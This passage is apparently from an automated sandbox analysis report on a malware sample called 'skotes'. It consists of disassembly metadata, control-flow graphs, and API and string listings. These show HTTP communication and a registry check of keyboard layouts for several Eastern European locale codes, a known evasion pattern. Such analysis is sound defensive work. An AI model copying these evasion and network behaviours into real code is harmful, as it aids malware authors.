                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                                                                                                                                                                                          • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 1439999335-885246636
                                                                                                                                                                                                                                          • Opcode ID: d404ea9c636f7c605c54a1dc86278e3f6ef94298add13a8f1a2eaa21f2708f2c
                                                                                                                                                                                                                                          • Instruction ID: b5cb5983320d8a9066c189b6edfd12524145e77465a747fbdb251df8f8fe6b3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d404ea9c636f7c605c54a1dc86278e3f6ef94298add13a8f1a2eaa21f2708f2c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2B1D2B1A001189BDF28DF28CC84BAEBB6AEF45314F50419DF509976C2DB719AC4CF99
                                                                                                                                                                                                                                          Function 00696020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1685 696020-69619d call 6ae150 call 6a80c0 * 5 RegOpenKeyExA 1698 6964b1-6964ba 1685->1698 1699 6961a3-696233 call 6c40f0 1685->1699 1701 6964bc-6964c7 1698->1701 1702 6964e7-6964f0 1698->1702 1725 696239-69623d 1699->1725 1726 69649f-6964ab 1699->1726 1704 6964c9-6964d7 1701->1704 1705 6964dd-6964e4 call 6ad663 1701->1705 1706 69651d-696526 1702->1706 1707 6964f2-6964fd 1702->1707 1704->1705 1710 6965d7-6965df call 6c6c6a 1704->1710 1705->1702 1708 696528-696533 1706->1708 1709 696553-69655c 1706->1709 1712 6964ff-69650d 1707->1712 1713 696513-69651a call 6ad663 1707->1713 1716 696549-696550 call 6ad663 1708->1716 1717 696535-696543 1708->1717 1719 69655e-696569 1709->1719 1720 696585-69658e 1709->1720 1712->1710 1712->1713 1713->1706 1716->1709 1717->1710 1717->1716 1729 69657b-696582 call 6ad663 1719->1729 1730 69656b-696579 1719->1730 1722 6965bb-6965d6 call 6acff1 1720->1722 1723 696590-69659f 1720->1723 1731 6965b1-6965b8 call 6ad663 1723->1731 1732 6965a1-6965af 1723->1732 1734 696499 1725->1734 1735 696243-696279 RegEnumValueA 1725->1735 1726->1698 1729->1720 1730->1710 1730->1729 1731->1722 1732->1710 1732->1731 1734->1726 1741 69627f-69629e 1735->1741 1742 696486-69648d 1735->1742 1746 6962a0-6962a5 1741->1746 1742->1735 1744 696493 1742->1744 1744->1734 1746->1746 1747 6962a7-6962fb call 6a80c0 call 6a7a00 * 2 call 695d50 1746->1747 1747->1742
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0069617D
                                                                                                                                                                                                                                          • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00696271
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnumOpenValue
                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                          • API String ID: 2571532894-3963862150
                                                                                                                                                                                                                                          • Opcode ID: 56496af0fd4e6e6cbdfe0fc47b34a8f6eb1d58004326955dfc0130c808ec3163
                                                                                                                                                                                                                                          • Instruction ID: 173d6680a03a44fb34fcc74bebcd0223119e6e8f641994e2fc1456898f72680c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56496af0fd4e6e6cbdfe0fc47b34a8f6eb1d58004326955dfc0130c808ec3163
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CB1C0719002689BDF24DB64CC84BDEB7BAAF05340F4442D9F108E7691DB74AFA88F94
                                                                                                                                                                                                                                          Function 00697D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1825 697d30-697db2 call 6c40f0 1829 697db8-697de0 call 6a7a00 call 695c10 1825->1829 1830 698356-698373 call 6acff1 1825->1830 1837 697de2 1829->1837 1838 697de4-697e06 call 6a7a00 call 695c10 1829->1838 1837->1838 1843 697e08 1838->1843 1844 697e0a-697e23 1838->1844 1843->1844 1847 697e25-697e34 1844->1847 1848 697e54-697e7f 1844->1848 1851 697e4a-697e51 call 6ad663 1847->1851 1852 697e36-697e44 1847->1852 1849 697e81-697e90 1848->1849 1850 697eb0-697ed1 1848->1850 1853 697e92-697ea0 1849->1853 1854 697ea6-697ead call 6ad663 1849->1854 1855 697ed3-697ed5 GetNativeSystemInfo 1850->1855 1856 697ed7-697edc 1850->1856 1851->1848 1852->1851 1857 698374 call 6c6c6a 1852->1857 1853->1854 1853->1857 1854->1850 1860 697edd-697ee6 1855->1860 1856->1860 1867 698379-69837f call 6c6c6a 1857->1867 1865 697ee8-697eef 1860->1865 1866 697f04-697f07 1860->1866 1869 698351 1865->1869 1870 697ef5-697eff 1865->1870 1871 697f0d-697f16 1866->1871 1872 6982f7-6982fa 1866->1872 1869->1830 1875 69834c 1870->1875 1876 697f29-697f2c 1871->1876 1877 697f18-697f24 1871->1877 1872->1869 1873 6982fc-698305 1872->1873 1878 69832c-69832f 1873->1878 1879 698307-69830b 1873->1879 1875->1869 1880 697f32-697f39 1876->1880 1881 6982d4-6982d6 1876->1881 1877->1875 1886 69833d-698349 1878->1886 1887 698331-69833b 1878->1887 1882 69830d-698312 1879->1882 1883 698320-69832a 1879->1883 1884 698019-6982bd call 6a7a00 call 695c10 call 6a7a00 call 695c10 call 695d50 call 6a7a00 call 695c10 call 695730 call 6a7a00 call 695c10 call 6a7a00 call 695c10 call 695d50 call 6a7a00 call 695c10 call 695730 call 6a7a00 call 695c10 call 6a7a00 call 695c10 call 695d50 call 6a7a00 call 695c10 call 695730 call 6a7a00 call 695c10 call 6a7a00 call 695c10 call 695d50 call 6a7a00 call 695c10 call 695730 1880->1884 1885 697f3f-697f9b call 6a7a00 call 695c10 call 6a7a00 call 695c10 call 695d50 1880->1885 1888 6982d8-6982e2 1881->1888 1889 6982e4-6982e7 1881->1889 1882->1883 1890 698314-69831e 1882->1890 1883->1869 1925 6982c3-6982cc 1884->1925 1911 697fa0-697fa7 1885->1911 1886->1875 1887->1869 1888->1875 1889->1869 1893 6982e9-6982f5 1889->1893 1890->1869 1893->1875 1913 697fa9 1911->1913 1914 697fab-697fcb call 6c8bbe 1911->1914 1913->1914 1919 697fcd-697fdc 1914->1919 1920 698002-698004 1914->1920 1922 697fde-697fec 1919->1922 1923 697ff2-697fff call 6ad663 1919->1923 1924 69800a-698014 1920->1924 1920->1925 1922->1867 1922->1923 1923->1920 1924->1925 1925->1872 1929 6982ce 1925->1929 1929->1881
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00697ED3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                                                                                                                          • API String ID: 1721193555-3123340372
                                                                                                                                                                                                                                          • Opcode ID: beb85c206dd3e3a1a1573119171d2f64509de3e55cc8fe4d8b76bc9498f44841
                                                                                                                                                                                                                                          • Instruction ID: 7affea2304d22e57025cea4810364e26f6c7be7dee0fe06007b78cd5887f28cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: beb85c206dd3e3a1a1573119171d2f64509de3e55cc8fe4d8b76bc9498f44841
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E12870E002449BDF15BB68CC1B3AD7B67AB42720F94028CE4166B7C2DB758F918BC6
                                                                                                                                                                                                                                          Function 006D1ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1979 6d1abc-6d1aec call 6d180a 1982 6d1aee-6d1af9 call 6c75e3 1979->1982 1983 6d1b07-6d1b13 call 6cbf3a 1979->1983 1988 6d1afb-6d1b02 call 6c75f6 1982->1988 1989 6d1b2c-6d1b75 call 6d1775 1983->1989 1990 6d1b15-6d1b2a call 6c75e3 call 6c75f6 1983->1990 1997 6d1de1-6d1de5 1988->1997 1999 6d1b77-6d1b80 1989->1999 2000 6d1be2-6d1beb GetFileType 1989->2000 1990->1988 2004 6d1bb7-6d1bdd call 6c75c0 1999->2004 2005 6d1b82-6d1b86 1999->2005 2001 6d1bed-6d1c1e call 6c75c0 2000->2001 2002 6d1c34-6d1c37 2000->2002 2001->1988 2026 6d1c24-6d1c2f call 6c75f6 2001->2026 2007 6d1c39-6d1c3e 2002->2007 2008 6d1c40-6d1c46 2002->2008 2004->1988 2005->2004 2006 6d1b88-6d1bb5 call 6d1775 2005->2006 2006->2000 2006->2004 2010 6d1c4a-6d1c98 call 6cbe85 2007->2010 2008->2010 2012 6d1c48 2008->2012 2021 6d1c9a-6d1ca6 call 6d1984 2010->2021 2022 6d1cb7-6d1cdf call 6d1522 2010->2022 2012->2010 2021->2022 2032 6d1ca8 2021->2032 2030 6d1ce4-6d1d25 2022->2030 2031 6d1ce1-6d1ce2 2022->2031 2026->1988 2035 6d1d27-6d1d2b 2030->2035 2036 6d1d46-6d1d54 2030->2036 2034 6d1caa-6d1cb2 call 6caf48 2031->2034 2032->2034 2034->1997 2035->2036 2037 6d1d2d-6d1d41 2035->2037 2038 6d1ddf 2036->2038 2039 6d1d5a-6d1d5e 2036->2039 2037->2036 2038->1997 2039->2038 2042 6d1d60-6d1d93 call 6d1775 2039->2042 2046 6d1d95-6d1dc1 call 6c75c0 call 6cc04d 2042->2046 2047 6d1dc7-6d1ddb 2042->2047 2046->2047 2047->2038
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 006D1775: CreateFileW.KERNEL32(00000000,00000000,?,006D1B65,?,?,00000000,?,006D1B65,00000000,0000000C), ref: 006D1792
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 006D1BD7
                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 006D1BE3
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 006D1BF6
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 006D1D9C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
